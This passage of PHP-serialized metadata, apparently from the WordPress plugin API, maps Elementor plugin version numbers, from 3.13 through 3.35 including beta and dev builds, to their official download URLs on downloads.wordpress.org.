-beta3.zip\";s:11:\"3.13.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.13.0-dev3.zip\";s:11:\"3.13.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.13.0-dev4.zip\";s:6:\"3.13.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.13.1.zip\";s:6:\"3.13.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.13.2.zip\";s:6:\"3.13.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.13.3.zip\";s:6:\"3.13.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.13.4.zip\";s:6:\"3.14.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.14.0.zip\";s:12:\"3.14.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.14.0-beta1.zip\";s:12:\"3.14.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.14.0-beta2.zip\";s:12:\"3.14.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.14.0-beta3.zip\";s:12:\"3.14.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.14.0-beta4.zip\";s:12:\"3.14.0-beta5\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.14.0-beta5.zip\";s:6:\"3.14.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.14.1.zip\";s:6:\"3.15.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.15.0.zip\";s:6:\"3.15.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.15.1.zip\";s:6:\"3.15.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.15.2.zip\";s:6:\"3.15.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.15.3.zip\";s:6:\"3.16.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.0.zip\";s:12:\"3.16.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.16.0-beta3.zip\";s:12:\"3.16.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.16.0-beta4.zip\";s:11:\"3.16.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.16.0-dev1.zip\";s:11:\"3.16.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.16.0-dev2.zip\";s:6:\"3.16.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.1.zip\";s:6:\"3.16.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.2.zip\";s:6:\"3.16.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.3.zip\";s:6:\"3.16.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.4.zip\";s:6:\"3.16.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.5.zip\";s:6:\"3.16.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.16.6.zip\";s:6:\"3.17.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.17.0.zip\";s:11:\"3.17.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.17.0-dev2.zip\";s:11:\"3.17.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.17.0-dev3.zip\";s:11:\"3.17.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.17.0-dev4.zip\";s:6:\"3.17.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.17.1.zip\";s:6:\"3.17.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.17.2.zip\";s:6:\"3.17.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.17.3.zip\";s:6:\"3.18.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.18.0.zip\";s:12:\"3.18.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.18.0-beta1.zip\";s:12:\"3.18.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.18.0-beta2.zip\";s:12:\"3.18.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.18.0-beta3.zip\";s:12:\"3.18.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.18.0-beta4.zip\";s:11:\"3.18.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.18.0-dev1.zip\";s:6:\"3.18.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.18.1.zip\";s:6:\"3.18.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.18.2.zip\";s:6:\"3.18.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.18.3.zip\";s:6:\"3.19.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.19.0.zip\";s:12:\"3.19.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta1.zip\";s:12:\"3.19.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta2.zip\";s:12:\"3.19.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta3.zip\";s:12:\"3.19.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta4.zip\";s:12:\"3.19.0-beta5\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta5.zip\";s:12:\"3.19.0-beta6\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-beta6.zip\";s:11:\"3.19.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev1.zip\";s:11:\"3.19.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev2.zip\";s:11:\"3.19.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev3.zip\";s:11:\"3.19.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev4.zip\";s:11:\"3.19.0-dev5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev5.zip\";s:11:\"3.19.0-dev6\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.19.0-dev6.zip\";s:6:\"3.19.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.19.1.zip\";s:6:\"3.19.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.19.2.zip\";s:6:\"3.19.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.19.3.zip\";s:6:\"3.19.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.19.4.zip\";s:5:\"3.2.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.0.zip\";s:5:\"3.2.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.1.zip\";s:5:\"3.2.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.2.zip\";s:5:\"3.2.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.3.zip\";s:5:\"3.2.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.4.zip\";s:5:\"3.2.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.2.5.zip\";s:6:\"3.20.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.20.0.zip\";s:12:\"3.20.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-beta1.zip\";s:12:\"3.20.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-beta2.zip\";s:12:\"3.20.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-beta3.zip\";s:12:\"3.20.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-beta4.zip\";s:11:\"3.20.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-dev1.zip\";s:11:\"3.20.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-dev2.zip\";s:11:\"3.20.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-dev3.zip\";s:11:\"3.20.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.20.0-dev4.zip\";s:6:\"3.20.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.20.1.zip\";s:6:\"3.20.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.20.2.zip\";s:6:\"3.20.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.20.3.zip\";s:6:\"3.20.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.20.4.zip\";s:6:\"3.21.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.0.zip\";s:12:\"3.21.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-beta1.zip\";s:12:\"3.21.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-beta2.zip\";s:12:\"3.21.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-beta3.zip\";s:11:\"3.21.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-dev1.zip\";s:11:\"3.21.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-dev2.zip\";s:11:\"3.21.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.21.0-dev3.zip\";s:6:\"3.21.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.1.zip\";s:6:\"3.21.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.2.zip\";s:6:\"3.21.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.3.zip\";s:6:\"3.21.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.4.zip\";s:6:\"3.21.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.5.zip\";s:6:\"3.21.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.6.zip\";s:6:\"3.21.7\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.7.zip\";s:6:\"3.21.8\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.21.8.zip\";s:6:\"3.22.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.22.0.zip\";s:12:\"3.22.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta1.zip\";s:12:\"3.22.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta2.zip\";s:12:\"3.22.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta3.zip\";s:12:\"3.22.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta4.zip\";s:12:\"3.22.0-beta5\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta5.zip\";s:12:\"3.22.0-beta6\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-beta6.zip\";s:11:\"3.22.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev1.zip\";s:11:\"3.22.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev2.zip\";s:11:\"3.22.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev3.zip\";s:11:\"3.22.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev4.zip\";s:11:\"3.22.0-dev5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev5.zip\";s:11:\"3.22.0-dev6\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.22.0-dev6.zip\";s:6:\"3.22.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.22.1.zip\";s:6:\"3.22.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.22.2.zip\";s:6:\"3.22.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.22.3.zip\";s:6:\"3.23.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.23.0.zip\";s:12:\"3.23.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta1.zip\";s:12:\"3.23.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta2.zip\";s:12:\"3.23.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta3.zip\";s:12:\"3.23.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta4.zip\";s:12:\"3.23.0-beta5\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta5.zip\";s:12:\"3.23.0-beta6\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-beta6.zip\";s:11:\"3.23.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev1.zip\";s:11:\"3.23.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev2.zip\";s:11:\"3.23.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev3.zip\";s:11:\"3.23.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev4.zip\";s:11:\"3.23.0-dev5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev5.zip\";s:11:\"3.23.0-dev6\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.23.0-dev6.zip\";s:6:\"3.23.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.23.1.zip\";s:6:\"3.23.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.23.2.zip\";s:6:\"3.23.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.23.3.zip\";s:6:\"3.23.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.23.4.zip\";s:6:\"3.24.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.0.zip\";s:12:\"3.24.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-beta1.zip\";s:12:\"3.24.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-beta2.zip\";s:12:\"3.24.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-beta3.zip\";s:11:\"3.24.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-dev1.zip\";s:11:\"3.24.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-dev2.zip\";s:11:\"3.24.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.24.0-dev3.zip\";s:6:\"3.24.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.1.zip\";s:6:\"3.24.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.2.zip\";s:6:\"3.24.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.3.zip\";s:6:\"3.24.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.4.zip\";s:6:\"3.24.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.5.zip\";s:6:\"3.24.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.6.zip\";s:6:\"3.24.7\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.7.zip\";s:6:\"3.24.8\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.24.8.zip\";s:6:\"3.25.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.0.zip\";s:12:\"3.25.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-beta1.zip\";s:12:\"3.25.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-beta2.zip\";s:12:\"3.25.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-beta3.zip\";s:11:\"3.25.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-dev1.zip\";s:11:\"3.25.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-dev2.zip\";s:11:\"3.25.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.25.0-dev3.zip\";s:6:\"3.25.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.1.zip\";s:7:\"3.25.10\";s:60:\"https://downloads.wordpress.org/plugin/elementor.3.25.10.zip\";s:7:\"3.25.11\";s:60:\"https://downloads.wordpress.org/plugin/elementor.3.25.11.zip\";s:6:\"3.25.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.2.zip\";s:6:\"3.25.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.3.zip\";s:6:\"3.25.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.4.zip\";s:6:\"3.25.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.5.zip\";s:6:\"3.25.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.6.zip\";s:6:\"3.25.7\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.7.zip\";s:6:\"3.25.8\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.8.zip\";s:6:\"3.25.9\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.25.9.zip\";s:6:\"3.26.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.0.zip\";s:12:\"3.26.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-beta1.zip\";s:12:\"3.26.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-beta2.zip\";s:12:\"3.26.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-beta3.zip\";s:12:\"3.26.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-beta4.zip\";s:12:\"3.26.0-beta5\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-beta5.zip\";s:11:\"3.26.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-dev1.zip\";s:11:\"3.26.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-dev2.zip\";s:11:\"3.26.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-dev3.zip\";s:11:\"3.26.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-dev4.zip\";s:11:\"3.26.0-dev5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.26.0-dev5.zip\";s:6:\"3.26.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.1.zip\";s:6:\"3.26.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.2.zip\";s:6:\"3.26.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.3.zip\";s:6:\"3.26.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.4.zip\";s:6:\"3.26.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.26.5.zip\";s:6:\"3.27.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.0.zip\";s:12:\"3.27.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.27.0-beta1.zip\";s:12:\"3.27.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.27.0-beta2.zip\";s:11:\"3.27.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.27.0-dev1.zip\";s:11:\"3.27.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.27.0-dev2.zip\";s:6:\"3.27.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.1.zip\";s:6:\"3.27.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.2.zip\";s:6:\"3.27.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.3.zip\";s:6:\"3.27.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.4.zip\";s:6:\"3.27.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.5.zip\";s:6:\"3.27.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.6.zip\";s:6:\"3.27.7\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.27.7.zip\";s:6:\"3.28.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.28.0.zip\";s:12:\"3.28.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-beta1.zip\";s:12:\"3.28.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-beta2.zip\";s:12:\"3.28.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-beta3.zip\";s:11:\"3.28.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-dev1.zip\";s:11:\"3.28.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-dev2.zip\";s:11:\"3.28.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.28.0-dev3.zip\";s:6:\"3.28.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.28.1.zip\";s:6:\"3.28.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.28.2.zip\";s:6:\"3.28.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.28.3.zip\";s:6:\"3.28.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.28.4.zip\";s:6:\"3.29.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.29.0.zip\";s:12:\"3.29.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-beta1.zip\";s:12:\"3.29.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-beta2.zip\";s:12:\"3.29.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-beta3.zip\";s:12:\"3.29.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-beta4.zip\";s:11:\"3.29.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-dev1.zip\";s:11:\"3.29.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-dev2.zip\";s:11:\"3.29.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-dev3.zip\";s:11:\"3.29.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.29.0-dev4.zip\";s:6:\"3.29.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.29.1.zip\";s:6:\"3.29.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.29.2.zip\";s:5:\"3.3.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.3.0.zip\";s:5:\"3.3.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.3.1.zip\";s:6:\"3.30.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.30.0.zip\";s:12:\"3.30.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-beta1.zip\";s:12:\"3.30.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-beta2.zip\";s:12:\"3.30.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-beta3.zip\";s:11:\"3.30.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-dev1.zip\";s:11:\"3.30.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-dev2.zip\";s:11:\"3.30.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.30.0-dev3.zip\";s:6:\"3.30.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.30.1.zip\";s:6:\"3.30.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.30.2.zip\";s:6:\"3.30.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.30.3.zip\";s:6:\"3.30.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.30.4.zip\";s:6:\"3.31.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.0.zip\";s:12:\"3.31.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.31.0-beta1.zip\";s:12:\"3.31.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.31.0-beta2.zip\";s:11:\"3.31.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.31.0-dev1.zip\";s:11:\"3.31.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.31.0-dev2.zip\";s:6:\"3.31.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.1.zip\";s:6:\"3.31.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.2.zip\";s:6:\"3.31.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.3.zip\";s:6:\"3.31.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.4.zip\";s:6:\"3.31.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.31.5.zip\";s:6:\"3.32.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.0.zip\";s:12:\"3.32.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-beta1.zip\";s:12:\"3.32.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-beta2.zip\";s:12:\"3.32.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-beta3.zip\";s:11:\"3.32.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-dev1.zip\";s:11:\"3.32.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-dev2.zip\";s:11:\"3.32.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.32.0-dev3.zip\";s:6:\"3.32.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.1.zip\";s:6:\"3.32.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.2.zip\";s:6:\"3.32.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.3.zip\";s:6:\"3.32.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.4.zip\";s:6:\"3.32.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.5.zip\";s:6:\"3.33.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.0.zip\";s:12:\"3.33.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-beta1.zip\";s:12:\"3.33.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-beta2.zip\";s:12:\"3.33.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-beta3.zip\";s:12:\"3.33.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-beta4.zip\";s:11:\"3.33.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-dev1.zip\";s:11:\"3.33.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-dev2.zip\";s:11:\"3.33.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-dev3.zip\";s:11:\"3.33.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.33.0-dev4.zip\";s:6:\"3.33.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.1.zip\";s:6:\"3.33.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.2.zip\";s:6:\"3.33.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.3.zip\";s:6:\"3.33.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.4.zip\";s:6:\"3.33.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.5.zip\";s:6:\"3.33.6\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.33.6.zip\";s:6:\"3.34.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.34.0.zip\";s:12:\"3.34.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.34.0-beta1.zip\";s:12:\"3.34.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.34.0-beta2.zip\";s:12:\"3.34.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.34.0-beta3.zip\";s:11:\"3.34.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.34.0-dev1.zip\";s:11:\"3.34.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.34.0-dev2.zip\";s:6:\"3.34.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.34.1.zip\";s:6:\"3.34.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.34.2.zip\";s:6:\"3.34.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.34.3.zip\";s:6:\"3.34.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.34.4.zip\";s:6:\"3.35.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.0.zip\";s:12:\"3.35.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-beta1.zip\";s:12:\"3.35.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-beta2.zip\";s:12:\"3.35.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-beta3.zip\";s:12:\"3.35.0-beta4\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-beta4.zip\";s:11:\"3.35.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-dev1.z